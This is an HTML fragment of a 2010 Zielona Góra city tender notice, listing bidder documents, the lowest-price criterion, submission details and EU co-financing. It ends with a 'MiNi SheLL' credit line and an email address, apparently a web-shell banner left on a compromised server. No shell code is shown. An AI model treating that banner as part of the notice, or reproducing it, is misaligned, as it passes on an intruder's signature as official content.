<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony formularz oferty wg załącznika Nr 1 do SIWZ;
2)	oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia, której wykonanie powierzy podwykonawcom wg załącznika Nr 2 do SIWZ; 
3)	wypełnione i podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1 - 4 ustawy pzp wg załącznika Nr 3 do SIWZ;
4)	pisemne zobowiązanie, o którym mowa w pkt 5.2. SIWZ, o ile Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy pzp;
10)	dokładnie wypełnione kosztorysy ofertowe na formularzach wg załącznika nr 9 do niniejszej SIWZ; 
11)	pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zgodnie z pkt 38 SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zielona-gora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ w formie papierowej można odbierać w siedzibie Zamawiającego nr pokoju 407 - cena 709,60 zł (722,50 zł przy przesyłce pocztą).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2010 godzina 11:00, miejsce: w siedzibie Zamawiającego tj. w Urzędzie Miasta Zielona Góra, 
65-424 Zielona Góra, ul. Podgórna 22, pokój 407.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zadanie współfinansowane ze środków Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com